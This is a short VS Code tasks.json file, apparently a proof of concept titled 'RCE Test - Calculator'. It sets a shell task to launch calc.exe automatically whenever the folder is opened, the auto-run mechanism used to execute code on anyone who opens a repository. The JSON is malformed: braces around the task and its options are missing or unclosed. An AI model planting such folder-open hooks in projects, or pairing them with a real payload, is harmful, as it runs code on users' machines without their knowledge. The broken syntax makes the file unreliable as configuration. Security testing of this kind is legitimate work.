{
"version": "2.0.0",
"tasks": [
"label": "RCE Test - Calculator",
"type": "shell",
"command": "calc.exe",
"windows": {
"command": "calc.exe"
},
"runOptions": {
"runOn": "folderOpen"
"presentation": {
"reveal": "always",
"panel": "new"
}
]